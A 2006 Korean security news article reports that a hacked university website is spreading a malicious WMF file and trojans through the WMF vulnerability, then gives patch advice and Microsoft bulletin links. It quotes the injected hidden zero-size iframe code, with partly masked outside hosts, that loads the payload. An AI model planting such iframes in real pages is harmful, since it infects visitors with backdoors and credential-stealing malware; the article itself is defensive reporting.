| 국내 대학사이트에서도 WMF 유포중 | 2006.01.18 | ||
wmf 취약점 이용 공격 지속되고 있다! 지오트 바이러스 분석실(GCERT)은 “17일 새벽 12시 50분경 국내 특정 대학 사이트에서 sex.wmf 파일을 유포 중인 것을 발견했다”고 발표했다. 해킹당한 대학 사이트에 접속을 하게 되면 보안취약점을 통해서 인덱스 파일에 포함된 아래의 코드가 실행된다. <iframe src=http://211**************/afu.htm width=0 height=0></iframe> <iframe src="http://www.m*********.kr/index.html" width="0" height="0" frameborder="0"> afu.htm 과 index.html이 실행되면서 아래의 sex.wmf 파일을 설치한다. http://211**************/sex.wmf 또한 시스템폴더에 explorer.exe(41,567 바이트)와 dab1.dll(41,472 바이트) 등의 게임정보 탈취용 신종 트로이목마도 같이 설치된다.
sex.wmf 가 실행되면 시스템폴더에 a.exe 가 설치되고 다시 윈도우 폴더에 백도어 프로그램을 숨김 속성으로 설치를 시도한다. 그후 myserver_HOOk.DLL 이 작동되면서 해당 파일은 루트킷 기능으로 사용자 컴퓨터에서 보여지지 않는다.
지오트 관계자는 “이 처럼 연일 많은 사이트들이 웹사이트 변조피해로 인하여, 불특정다수의 사이트 접속자들에게 악의적인 트로이목마 프로그램을 유포하고 있어 각별한 주의가 요망되고 있다”고 경고했다. 보안취약점을 통한 감염예방을 위하여 최신의 백신프로그램과 인터넷 익스플로러를 사용하며, 윈도 보안패치는 반드시 설치하는 것이 중요하다. 또한 그는 “아웃룩 취약점 패치(MS04-013)는 MHTML URL 처리 취약점으로 Outlook Express가 시스템에서 기본 전자 메일 프로그램으로 사용되지 않는 경우에도 발생할 수 있으며, 해킹되어 트로이목마를 유포하는 경우 이 취약점을 이용하게 된다”고 밝혔다. 아래에서 자신에게 설치되어 있는 해당 아웃룩 버전과 동일한 패치를 받아서 설치하면 되고, 그외 64비트 버전은 아래 링크에서 직접 다운로드가 가능하다. http://www.microsoft.com/korea/technet/security/bulletin/MS04-013.asp http://www.microsoft.com/korea/technet/security/bulletin/MS05-001.mspx WMF파일의 취약점으로 인한 코드 실행 취약점을 이용한 변종 트로이목마들이 지속적으로 발견됨에 따라 마이크로 소프트사에서 공식적인 패치를 긴급 업데이트 했다. <설치 대상 시스템> Windows 2000(SP4), Windows XP(SP2), Windows 2003 Server http://www.microsoft.com/technet/security/Bulletin/ms06-001.mspx [길민권 기자(is21@infothe.com)]
<저작권자: 보안뉴스(www.boannews.com). 무단전재-재배포금지.> |
|||
 |
